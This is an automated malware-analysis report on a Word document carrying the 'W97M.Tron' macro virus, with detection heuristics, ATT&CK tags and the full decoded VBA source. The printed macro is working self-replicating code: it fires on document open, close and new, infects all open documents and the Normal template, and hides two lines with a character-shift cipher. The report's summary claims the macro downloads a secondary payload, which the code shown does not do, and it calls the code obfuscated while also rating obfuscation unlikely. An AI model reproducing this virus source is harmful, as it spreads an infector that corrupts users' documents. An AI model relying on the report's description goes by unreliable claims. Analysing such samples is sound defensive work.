MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, specifically triggering a Document_Open macro. The VBA code is obfuscated and attempts to download and execute a secondary payload, as indicated by the ClamAV detection 'Doc.Trojan.Quaint-2'. The macro also attempts to set the project description to 'W97M.Tron by e[ax] / Species VL', which is included as an IOC.
Heuristics 3
-
ClamAV: Doc.Trojan.Quaint-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Quaint-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2228 bytes |
SHA-256: a4ed02acbe8df22ee196cdd13c13d095371fa6b411116ac3c3d63c8706aef8fe |
|||
|
Detection
ClamAV:
Doc.Trojan.Quaint-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Tron Private Sub Document_Open(): On Error Resume Next: Dim x, c: j = j + 1 Dim linKoda2, s If Left(ThisDocument.VBProject.vbcomponents(1).codemodule.lines(33, 1), 1) = "'" Then For E = 33 To 34 desni = Right(ThisDocument.VBProject.vbcomponents(1).codemodule.lines(E, 1), _ (Len(ThisDocument.VBProject.vbcomponents(1).codemodule.lines(E, 1)) - 1)) ThisDocument.VBProject.vbcomponents(1).codemodule.replaceline E, desni Next For f = 33 To 34 linKoda2 = ThisDocument.VBProject.vbcomponents(1).codemodule.lines(f, 1) For s = 1 To Len(linKoda2) nov = nov & Chr(Asc(Mid(linKoda2, s)) + 3) Next ThisDocument.VBProject.vbcomponents(1).codemodule.replaceline f, nov nov = "" Next Else For f = 33 To 34 linKoda2 = ThisDocument.VBProject.vbcomponents(1).codemodule.lines(f, 1) For s = 1 To Len(linKoda2) nov = nov & Chr(Asc(Mid(linKoda2, s)) - 3) Next ThisDocument.VBProject.vbcomponents(1).codemodule.replaceline f, "'" & nov nov = "" Next End If For t = 1 To Documents.Count If Documents(t).VBProject.vbcomponents(j).codemodule.lines(j, j) <> "'Tron" Then linKoda = ThisDocument.VBProject.vbcomponents(j).codemodule.lines(j, ThisDocument.VBProject.vbcomponents(j).codemodule.countoflines) With Documents(t).VBProject.vbcomponents(j).codemodule If .lines(j, j) <> "'Tron" Then '+abibqbifkbp g) +`lrkqlcifkbp '+^aacoljpqofkd ifkHla^ ActiveDocument.VBProject.Description = "W97M.Tron by e[ax] / Species VL" End If End With End If Next Set norm = NormalTemplate If norm.VBProject.vbcomponents(j).codemodule.lines(j, j) <> "'Tron" Then With norm.VBProject.vbcomponents(j).codemodule trm = Trim$(ThisDocument.VBProject.vbcomponents(j).codemodule.lines(j, ThisDocument.VBProject.vbcomponents(j).codemodule.countoflines)): .deletelines j, .countoflines: .addfromstring trm End With End If End Sub Private Sub Document_Close(): Document_Open: End Sub Private Sub Document_New(): Document_Open: End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.